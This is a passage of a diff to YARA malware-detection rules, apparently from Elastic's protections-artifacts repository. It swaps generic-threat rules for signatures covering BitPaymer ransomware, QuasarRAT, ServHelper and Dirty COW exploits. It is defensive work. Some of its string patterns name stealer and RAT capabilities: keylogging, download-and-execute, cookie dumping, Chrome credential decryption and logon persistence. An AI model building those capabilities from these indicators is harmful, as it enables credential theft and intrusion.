CF E8 45 F8 FF FF EB 0F 56 57 8B FE 8B F3 B9 47 00 00 00 F3 A5 5F 5E } + $a1 = "_sqlDataTypeSize" + $a2 = "ChromeGetName" + $a3 = "get_os_crypt" condition: all of them } -rule ELASTIC_Windows_Generic_Threat_642Df623 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_9997489C : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "642df623-00ae-48a9-8d61-aaa688606807" - date = "2024-02-20" - modified = "2024-06-12" + id = "9997489c-4e22-4df1-90cb-dd098ca26505" + date = "2024-01-31" + modified = "2024-02-08" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2680-L2698" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e5ba85d1a6a54df38b5fa655703c3457783f4a4f71e178f83d8aac878d4847da" - logic_hash = "555eb66f117312fa4ff3a49c0c40f89caddec3eb4b93d11bda2cce40529d46a0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L262-L290" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "857bbf64ced06f76eb50afbfbb699c62e11625196213c2e5267b828cca911b74" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "fb2c74f7e3e7f4e25173c375fe863e643183da4f5d718d61fdd0271fcc581deb" - severity = 50 + fingerprint = "4c872be4e5eaf46c92e6f7d62ed0801992c36fee04ada1a1a3039890e2893d8c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 50 B8 04 00 00 00 81 C4 04 F0 FF FF 50 48 75 F6 8B 45 FC 81 C4 3C FE FF FF 53 56 57 64 8B 05 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC 33 C9 8B 45 FC 89 45 DC 8B 45 } + $ldrload_dll = { 43 6A 45 9E } + $loadlibraryw = { F1 2F 07 B7 } + $ntallocatevirtualmemory = { EC B8 83 F7 } + $ntcreatethreadex = { B0 CF 18 AF } + $ntqueryinformationprocess = { C2 5D DC 8C } + $ntprotectvirtualmemory = { 88 28 E9 50 } + $ntreadvirtualmemory = { 03 81 28 A3 } + $ntwritevirtualmemory = { 92 01 17 C3 } + $rtladdvectoredexceptionhandler = { 89 6C F0 2D } + $rtlallocateheap = { 5A 4C E9 3B } + $rtlqueueworkitem = { 8E 02 92 AE } + $virtualprotect = { 0D 50 57 E8 } condition: - all of them + 4 of them } -rule ELASTIC_Windows_Generic_Threat_27A2994F : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_2993E5A5 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "27a2994f-18e4-4608-bda6-ee76b6afd357" - date = "2024-02-20" - modified = "2024-06-12" + id = "2993e5a5-26b2-4cfd-8130-4779abcfecb2" + date = "2024-03-18" + modified = "2024-03-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2700-L2718" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "e534914e06d90e119ce87f5abb446c57ec3473a29a7a9e7dc066fdc00dc68adc" - logic_hash = "66f34ba3052e2369528aeaf076f10d58f8f3dca420666246e02191fecb057f8c" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L292-L310" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9f9b926cef69e879462d9fa914dda8c60a01f3d409b55afb68c3fb94bf1a339b" + logic_hash = "37a10597d1afeb9411f6c652537186628291cbe6af680abe12bb96591add7e78" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "33d3f5b2c5fed68b19e14d6a35ee8db4ba3d6d566c87e24fc7a9223235cbd0ee" - severity = 50 + fingerprint = "709015984e3c9abaf141b76bf574921466493475182ca30a56dbc3671030b632" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 53 56 57 83 7D 08 00 75 05 E9 88 00 00 00 6A 09 E8 D7 FD FF FF 83 C4 04 8B 45 08 83 E8 20 89 45 FC 8B 4D FC 8B 51 14 81 E2 FF FF 00 00 83 FA 04 74 41 8B 45 FC 83 78 14 01 74 38 8B } + $a = { 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89 } condition: - all of them + 1 of them } -rule ELASTIC_Windows_Generic_Threat_Dbceec58 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Generic_0E135D58 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Generic (Windows.Trojan.Generic)" author = "Elastic Security" - id = "dbceec58-0b98-470c-8439-23aa26b4064f" - date = "2024-02-20" - modified = "2024-06-12" + id = "0e135d58-efd9-4d5e-95d8-ddd597f8e6a8" + date = "2024-03-19" + modified = "2024-03-19" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2720-L2738" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fbec30528e6f261aebf0d41f3cd6d35fcc937f1e20e1070f99b1b327f02b91e0" - logic_hash = "2a99fb7b342b43e3a4f0136d7d618625ca5708ae32e6fcabb11420bd8c89915b" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Generic.yar#L312-L330" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c" + logic_hash = "bc10218b1d761f72836bb5f9bb41d3f0fe13c4baa1109025269f938ec642aec4" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "5f470a7367ebbffebae8384aa552b3e9b1bda6bf4a3241bda047970341ee7c4c" - severity = 50 + fingerprint = "e1a9e0c4e5531ae4dd2962285789c3bb8bb2621aa20437384fc3abcc349718c6" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 14 83 7D 08 00 74 0C 83 7D 0C 00 74 06 83 7D 10 00 75 08 8B 45 08 E9 87 00 00 00 8B 45 08 89 45 FC 8B 45 0C 89 45 F8 8B 45 10 C1 E8 02 89 45 EC 83 65 F4 00 EB 07 8B 45 F4 40 89 } + $a = { 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B } condition: - all of them + 1 of them } -rule ELASTIC_Windows_Generic_Threat_7407Eb79 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Bitpaymer_D74273B3 : BETA FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Identifies BITPAYMER ransomware" author = "Elastic Security" - id = "7407eb79-69fd-4f5c-b883-ceb74fbdc9d5" - date = "2024-02-20" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2740-L2758" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9ae0f053c8e2c4f4381eac8265170b79301d4a22ec1fdb86e5eb212c51a75d14" - logic_hash = "a60c3e54493f9dab71584ba301c41c43f30d554df8c0b05674995faaf407ee48" + id = "d74273b3-d109-4b5d-beff-dffee9a984b1" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Bitpaymer.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "126246689b28e92ed10bfa6165f06ff7d4f0e062de7c58b821eaaf5e3cae9306" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "f1dbb42fdd80020fa2b30beb50ded6b8b3fe4b023935cef9bd32b3cb0a095654" - severity = 50 + tags = "BETA, FILE, MEMORY" + fingerprint = "4f913f06f7c7decbeb78187c566674f91ebbf929ad7057641659bb756cf2991b" + threat_name = "Windows.Ransomware.Bitpaymer" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 EC 18 8B 45 08 8B 40 08 89 45 E8 8B 45 08 8B 40 0C 89 45 EC 8B 45 EC 83 C0 0C 89 45 F0 8B 45 F0 8B 00 89 45 F8 83 65 F4 00 E8 00 00 00 00 58 89 45 F4 8B 45 F8 3B 45 F0 74 31 8B 45 } + $b1 = { 24 E8 00 00 00 29 F0 19 F9 89 8C 24 88 00 00 00 89 84 24 84 00 } condition: - all of them + 1 of ($b*) } -rule ELASTIC_Windows_Generic_Threat_3613Fa12 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Bitpaymer_Bca25Ac6 : BETA FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Identifies BITPAYMER ransomware" author = "Elastic Security" - id = "3613fa12-b559-4c3f-8049-11bacd5ffd0c" - date = "2024-02-20" - modified = "2024-06-12" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2760-L2778" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1403ec99f262c964e3de133a10815e34d2f104b113b0197ab43c6b7b40b536c0" - logic_hash = "77b23aaf384de138214e64342e170f3dce667ee41c3063c999286da9af6fff42" + id = "bca25ac6-e351-4823-be75-b0661c89588a" + date = "2020-06-25" + modified = "2021-08-23" + reference = "https://www.welivesecurity.com/2018/01/26/friedex-bitpaymer-ransomware-work-dridex-authors/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Ransomware_Bitpaymer.yar#L22-L48" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "7670f9dafacc8fc5998c1974af66ede388c0997545da067648fec4fd053f0001" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "c66b5dad2e9b19be0bc67a652761d8f79ce85efde055cc412575c2d7c5583795" - severity = 50 + tags = "BETA, FILE, MEMORY" + fingerprint = "2ecc7884d47ca7dbba30ba171b632859914d6152601ea7b463c0f52be79ebb8c" + threat_name = "Windows.Ransomware.Bitpaymer" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 55 8B EC 51 89 4D FC 8D 45 08 50 8B 4D FC E8 4D 03 00 00 8B 45 FC 8B E5 5D C2 04 00 CC CC CC CC 55 8B EC 51 89 4D FC 8B 45 FC 8B E5 5D C3 CC CC 55 8B EC 51 89 4D FC 8B 45 08 50 8B 4D FC E8 FD } + $a1 = "RWKGGE.PDB" fullword + $a2 = "*Qf69@+mESRA.RY7*+6XEF#NH.pdb" fullword + $a3 = "04QuURX.pdb" fullword + $a4 = "9nuhuNN.PDB" fullword + $a5 = "mHtXGC.PDB" fullword + $a6 = "S:\\Work\\_bin\\Release-Win32\\wp_encrypt_new.pdb" fullword + $a7 = "C:\\Work\\_bin\\Release-Win32\\wp_encrypt.pdb" fullword + $a8 = "k:\\softcare\\release\\h2O.pdb" fullword condition: - all of them + 1 of ($a*) } -rule ELASTIC_Windows_Generic_Threat_B125Fff2 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Quasarrat_E52Df647 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Quasarrat (Windows.Trojan.Quasarrat)" author = "Elastic Security" - id = "b125fff2-7b36-431f-8ed3-ccb6d4ff9483" - date = "2024-02-20" - modified = "2024-06-12" + id = "e52df647-c197-4790-b051-8951fba80c3b" + date = "2021-06-27" + modified = "2021-08-23" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2780-L2798" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9c641c0c8c2fd8831ee4e3b29a2a65f070b54775e64821c50b8ccd387e602097" - logic_hash = "054f3f36c688e1f5c3116e7a926df12df90f79dc1d42bee2616b5251f6ad2c24" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Quasarrat.yar#L1-L23" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "a58efd253a25cc764d63476931da2ddb305a0328253a810515f6735a6690de1d" + logic_hash = "41f32e0c9b3b43d10baef10060e064ad860558bcdeb4281a30d30c16615ed21d" score = 75 - quality = 75 + quality = 50 tags = "FILE, MEMORY" - fingerprint = "e2562c480b3ab0f0e6c5d396bc5d0584481348c1dd8edaac4484d9cb5d4a2b2e" - severity = 50 + fingerprint = "c888f0856c6568b83ab60193f8144a61e758e6ff53f6ead8565282ae8b3a9815" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 6F 00 00 0A 6F 70 00 00 0A 00 28 24 00 00 06 0A 06 2C 24 00 28 1B 00 00 06 0B 07 2C 19 00 28 CE 04 00 06 16 FE 01 0C 08 2C 0B 7E 03 00 00 04 6F D3 04 00 06 00 00 00 28 1A 00 00 06 00 28 18 00 } + $a1 = "GetKeyloggerLogsResponse" ascii fullword + $a2 = "DoDownloadAndExecute" ascii fullword + $a3 = "http://api.ipify.org/" wide fullword + $a4 = "Domain: {1}{0}Cookie Name: {2}{0}Value: {3}{0}Path: {4}{0}Expired: {5}{0}HttpOnly: {6}{0}Secure: {7}" wide fullword + $a5 = "\" /sc ONLOGON /tr \"" wide fullword condition: - all of them + 4 of them } -rule ELASTIC_Windows_Generic_Threat_D7E5Ec2D : FILE MEMORY +rule ELASTIC_Windows_Trojan_Servhelper_F4Dee200 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Servhelper (Windows.Trojan.ServHelper)" author = "Elastic Security" - id = "d7e5ec2d-bcd1-41a3-80de-12808b9034c9" - date = "2024-02-20" - modified = "2024-06-12" + id = "f4dee200-5471-472b-a017-bfcc9c291cbe" + date = "2022-03-22" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2800-L2818" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fe711664a565566cbc710d5e678a9a30063a2db151ebec226e2abcd24c0a7e68" - logic_hash = "4edb8cc1da81e0b9b3a8facc9a9a7d1e27dff0d2db7851d06a209beec3ccb463" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ServHelper.yar#L1-L20" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05d183430a7afe16a3857fc4e87568fcc18518e108823c37eabf0514660aa17c" + logic_hash = "abab541ebddf36c05e351d506d4f978a30d8a44ff09233a667d62a1692dabe15" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "e679e6917c5055384c0492e4a8a7538b41e5239b78e2167b04fffa3693f036bb" - severity = 50 + fingerprint = "24e49a0c72e665a03cea66614481665eea962a0c6b0a2f9d459866d8070ab456" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 83 C4 F8 89 45 FC 8B 45 FC E8 17 FE FF FF 83 FA 00 75 03 83 F8 FF 77 16 8B 45 FC E8 F1 FE FF FF 83 FA 00 75 03 83 F8 FF 77 04 33 C0 EB 02 B0 01 88 45 FB 8A 45 FB 59 59 5D C3 8D 40 00 } + $a = { 48 8B 45 78 48 63 4D 44 48 8B 55 48 4C 63 45 44 48 0F B7 44 48 FE 66 42 33 44 42 FE 66 89 45 42 48 8D 4D 28 48 0F B7 55 42 E8 ?? ?? ?? ?? 48 8B 4D 70 48 8B 55 28 E8 ?? ?? ?? ?? 83 45 44 01 83 EB 01 85 DB 75 ?? } + $b = { 39 5D ?? 0F 8F ?? ?? ?? ?? 2B D8 83 C3 01 48 8B 45 ?? 48 63 4D ?? 66 83 7C 48 ?? 20 72 ?? 48 8B 45 ?? 48 63 4D ?? 66 83 7C 48 ?? 7F 76 ?? 48 8B 45 ?? 48 63 4D ?? 48 0F B7 44 48 ?? 66 83 E8 08 66 83 F8 07 77 ?? B2 01 8B C8 80 E1 7F D3 E2 48 0F B6 05 ?? ?? ?? ?? 84 C2 0F 95 C0 EB ?? 33 C0 84 C0 74 ?? 83 45 ?? 01 } condition: - all of them + any of them } -rule ELASTIC_Windows_Generic_Threat_1636C2Bf : FILE MEMORY +rule ELASTIC_Windows_Trojan_Servhelper_370C5287 : FILE MEMORY { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Windows Trojan Servhelper (Windows.Trojan.ServHelper)" author = "Elastic Security" - id = "1636c2bf-5506-4651-9c4c-cd6454386301" - date = "2024-03-04" - modified = "2024-06-12" + id = "370c5287-0e2f-4113-95b6-53d31671fa46" + date = "2022-03-24" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2820-L2838" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6e43916db43d8217214bbe4eb32ed3d82d0ac423cffc91d053a317a3dbe6dafb" - logic_hash = "c8b198cd5f9277ff3808ee2a313ab979d544b9e609d6623876d2e3c3c5668e38" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_ServHelper.yar#L22-L40" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "05d183430a7afe16a3857fc4e87568fcc18518e108823c37eabf0514660aa17c" + logic_hash = "8a2934c28efef6a5fed26dc88d074aee15b0869370c66f6a4d6eaedf070eaa9e" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b0cd9f484d4191d42091300be33c72a29c073c297b4e46811555fc6d1ab0f482" - severity = 50 + fingerprint = "a66134e9344cc5ba403fe0aad70e8a991c61582d6a5640c3b9e4a554374176a2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $a1 = { 28 00 00 0A 28 22 00 00 0A 80 19 00 00 04 28 3B 00 00 06 28 2D 00 00 0A 28 45 00 00 06 16 80 1D 00 00 04 7E 13 00 00 04 7E 15 00 00 04 16 7E 15 00 00 04 8E B7 16 14 FE 06 43 00 00 06 73 63 00 } + $a = { 00 10 66 01 00 48 66 01 00 98 07 2B 00 50 66 01 00 95 66 01 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_0A640296 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_364F3B7B : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "0a640296-0813-4cd3-b55b-01b3689e73d9" - date = "2024-03-04" - modified = "2024-06-12" + id = "364f3b7b-4361-44ca-bf49-e26c123ae4bd" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2840-L2858" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3682eff62caaf2c90adef447d3ff48a3f9c34c571046f379d2eaf121976f1d07" - logic_hash = "743c47c7a58e7d65261818b4b444aaf8015b9b55d3e54526b1d63a8770a6c5aa" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0d4c43bf0cdd6486a4bcab988517e58b8c15d276f41600e596ecc28b0b728e69" + logic_hash = "5950195453232e4752b58c9e466c4df1b5ca2b22d5325730de69cd4178438aa7" score = 75 quality = 75 - tags = "FILE, MEMORY" - fingerprint = "3fa8712dbf0cdb0581fc312bcfa2e9ea50e04cccba6dc93f377c1b64e96784aa" - severity = 50 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "ec6cf1d090cd57434c4d3c1c3511fd4b683ff109bfd0ce859552d58cbb83984a" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 28 00 00 0A 02 7B 0F 00 00 04 6F 29 00 00 0A 7D 10 00 00 04 02 7B 10 00 00 04 28 2A 00 00 0A 00 02 7B 08 00 00 04 7B 03 00 00 04 02 7B 10 00 00 04 6F 2B 00 00 0A 16 FE 01 0D 09 39 29 01 00 00 } + $a = { 9C 01 7E 24 48 8B 45 90 48 8B 40 08 48 89 45 F8 48 8B 45 F8 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_B1Ef4828 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_3A2Ed31B : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "b1ef4828-10bd-41f8-84b5-041bf3147c0b" - date = "2024-03-04" - modified = "2024-06-12" + id = "3a2ed31b-a8be-4aff-af5e-e1ff2676f3f9" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2860-L2879" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "29b20ff8ebad05e4a33c925251d08824ca155f5d9fa72d6f9e359e6ec6c61279" - logic_hash = "d5d63f38308c6f8e5ca54567c7c8b93fcde69601fbcc28d56d5231edd28163cf" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ebbf3bc39ec661e2029d88960a5608e348de92089099019348bc0e891841690f" + logic_hash = "30cd10e38cbda719d9c344efd813e9a19e738a5251e3622957c8349e94366a29" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "e867d9a0a489d95898f85578c71d7411eac3142539fcc88df51d1cf048d351a9" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "0e8e0f58deadf4838464c2f2bc860013e6d47c3d770d0ef743b5dd9021832cae" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 70 36 72 20 74 24 76 28 78 2C 7A 30 7C 34 7E 38 7E 3C 7E 40 7E 54 7E 74 7E 7C 5D } - $a2 = { 7E 30 7E 34 7E 43 7E 4F 7E 5A 7E 6E 7E 79 7E } + $a = { 55 48 89 E5 48 83 EC 30 48 89 7D D8 48 8B 45 D8 48 89 45 F0 BE 02 00 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_48Cbdc20 : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_7448814C : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "48cbdc20-386a-491e-8407-f7c4c348f2e9" - date = "2024-03-04" - modified = "2024-06-12" + id = "7448814c-1685-45a9-9a00-039b30485545" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2881-L2900" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "7a7704c64e64d3a1f76fc718d5b5a5e3d46beeeb62f0493f22e50865ddf66594" - logic_hash = "687d0f3dc85a7e4b23019deec59ee77c211101d40ed6622a952e69ebc4151483" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "e95d0783b635e34743109d090af17aef2e507e8c90060d171e71d9ac79e083ba" + logic_hash = "0024b2cc22bf6c2dfc3b73ba91080cea8d502659db38d94b19338382e2fc0c84" score = 75 - quality = 71 - tags = "FILE, MEMORY" - fingerprint = "98db38ebd05e99171489828491e6acfc7c4322283b325ed99429f366b0ee01a6" - severity = 50 + quality = 75 + tags = "FILE, MEMORY, CVE-2016-5195" + fingerprint = "25ffa8f3b2356deebc88d8831bc8664edd6543a7d722d6ddd72e89fad18c66e7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = { 5E 69 69 69 4E 42 42 42 3E 2E 2E 2E 25 } - $a2 = { 24 2E 2E 2E 2F 41 41 41 3A 51 51 51 47 5D 5D 5D 54 69 69 69 62 } + $a = { 9C 01 7E 24 48 8B 45 90 48 8B 40 08 48 89 45 C0 48 8B 45 C0 48 } condition: all of them } -rule ELASTIC_Windows_Generic_Threat_420E1Cdc : FILE MEMORY +rule ELASTIC_Linux_Exploit_CVE_2016_5195_2Fa988E3 : FILE MEMORY CVE_2016_5195 { meta: - description = "Detects Windows Generic Threat (Windows.Generic.Threat)" + description = "Detects Linux Exploit Cve 2016 5195 (Linux.Exploit.CVE-2016-5195)" author = "Elastic Security" - id = "420e1cdc-2d47-437a-986d-ff22d2fac978" - date = "2024-03-04" - modified = "2024-06-12" + id = "2fa988e3-dfaf-44c8-bfaa-889778858e22" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Generic_Threat.yar#L2902-L2920" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b20254e03f7f1e79fec51d614ee0cfe0cb87432f3a53cf98cf8c047c13e2d774" - logic_hash = "6bd8a7bd4392e04d64f2e0b93d80978f59f9af634a0c971ca61cb9cb593743e0" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_CVE_2016_5195.yar#L61-L79" + license_url = 